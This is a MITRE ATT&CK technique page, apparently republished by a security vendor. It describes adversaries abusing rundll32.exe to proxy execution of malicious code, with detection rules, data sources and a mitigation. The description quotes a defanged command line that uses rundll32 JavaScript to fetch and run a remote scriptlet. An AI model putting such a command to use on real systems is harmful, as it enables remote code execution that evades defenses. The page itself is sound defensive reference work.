Technique on mitre.org

T1218.011: Rundll32

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).

Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

mitre_attck_defense_evasion: PT-CR-199: Rundll32_AWL_Bypass: An attempt to bypass application-start restrictions by using rundll32.exe (a built-in Microsoft Windows utility used to execute DDL files) mitre_attck_defense_evasion: PT-CR-650: Suspicious_File_Created_By_Legal_Process: Detects creation of suspicious files by legitimate processes mitre_attck_cred_access: PT-CR-303: Comsvcs_Minidump_Usage: A user dumped the lsass process with comsvcs.dll hacking_tools: PT-CR-361: Koadic_Rundll32_Stager: Possible use of the Koadic software with Rundll32 is detected

Detection

ID	DS0009	Data source and component	Process: Process Creation	Description	Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. When monitoring for all instances of Rundll32 execution, as defined by the logic in the Detection Pseudocode, it is imperative to also investigate the full set of command-line parameters used. These parameters contain key information about the DLL payload, including the name, entry point, and optional arguments. Note: Event IDs are for Sysmon (Event ID 10 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for any instances of rundll32.exe but does no other filtering, which may result in false positives. Therefore, we recommend tuning any such analytics by including additional logic (e.g., testing the name of the user that created the process) that helps reduce false positives. Analytic 1 - RunDLL32.exe Monitoring `(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image= "rundll32.exe"`

ID	DS0017	Data source and component	Command: Command Execution	Description	Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Typical command-line usage of rundll32.exe is `"rundll32.exe DllFile,EntryPoint"` where `DllFile` is the name of the DLL file being called and EntryPoint the name of the entry point in the DLL file. DLLs stored on SMB shares can similarly be called using the syntax of `"rundll32.exe \\DllFile,EntryPoint"` where is the IPv4 address of the host of the SMB share. Rundll32 can also be used to execute arbitrary Javascript using the syntax `"rundll32.exe javascript:<code_block>"`where <code_block> is a string defining the Javascript code to be executed.

ID	DS0022	Data source and component	File: File Metadata	Description	Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/owner, permissions, etc.

ID	DS0011	Data source and component	Module: Module Load	Description	Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls. Static Portable Executable (PE) analysis tools can be used to examine and dump the exports of a particular DLL.

ID	Data source and component	Description
DS0009	Process: Process Creation	Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. When monitoring for all instances of Rundll32 execution, as defined by the logic in the Detection Pseudocode, it is imperative to also investigate the full set of command-line parameters used. These parameters contain key information about the DLL payload, including the name, entry point, and optional arguments. Note: Event IDs are for Sysmon (Event ID 10 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for any instances of rundll32.exe but does no other filtering, which may result in false positives. Therefore, we recommend tuning any such analytics by including additional logic (e.g., testing the name of the user that created the process) that helps reduce false positives. Analytic 1 - RunDLL32.exe Monitoring `(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image= "rundll32.exe"`
DS0017	Command: Command Execution	Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Typical command-line usage of rundll32.exe is `"rundll32.exe DllFile,EntryPoint"` where `DllFile` is the name of the DLL file being called and EntryPoint the name of the entry point in the DLL file. DLLs stored on SMB shares can similarly be called using the syntax of `"rundll32.exe \\DllFile,EntryPoint"` where is the IPv4 address of the host of the SMB share. Rundll32 can also be used to execute arbitrary Javascript using the syntax `"rundll32.exe javascript:<code_block>"`where <code_block> is a string defining the Javascript code to be executed.
DS0022	File: File Metadata	Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/owner, permissions, etc.
DS0011	Module: Module Load	Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls. Static Portable Executable (PE) analysis tools can be used to examine and dump the exports of a particular DLL.

Mitigation

ID	M1050	Name	Exploit Protection	Description	Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.

ID	Name	Description
M1050	Exploit Protection	Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.